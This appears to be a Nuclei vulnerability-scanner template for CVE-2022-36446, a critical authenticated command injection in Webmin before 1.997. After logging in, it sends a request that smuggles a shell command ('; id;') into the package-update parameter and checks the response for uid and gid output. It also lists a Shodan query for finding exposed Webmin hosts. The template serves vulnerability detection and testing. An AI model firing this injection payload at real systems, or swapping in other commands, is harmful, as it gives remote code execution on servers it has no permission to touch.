id: CVE-2022-36446 info: name: Webmin <1.997 - Authenticated Remote Code Execution author: gy741 severity: critical description: | Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 - https://www.exploit-db.com/exploits/50998 - https://github.com/webmin/webmin/compare/1.996...1.997 - https://nvd.nist.gov/vuln/detail/CVE-2022-36446 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-36446 cwe-id: CWE-116 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* epss-score: 0.97101 metadata: max-request: 2 shodan-query: title:"Webmin" tags: cve2022,webmin,rce,authenticated,edb,cve http: - raw: - | POST /session_login.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}} - | POST /package-updates/update.cgi HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1 mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '{{randstr}}' - 'uid' - 'gid' - 'groups' condition: and - type: status status: - 200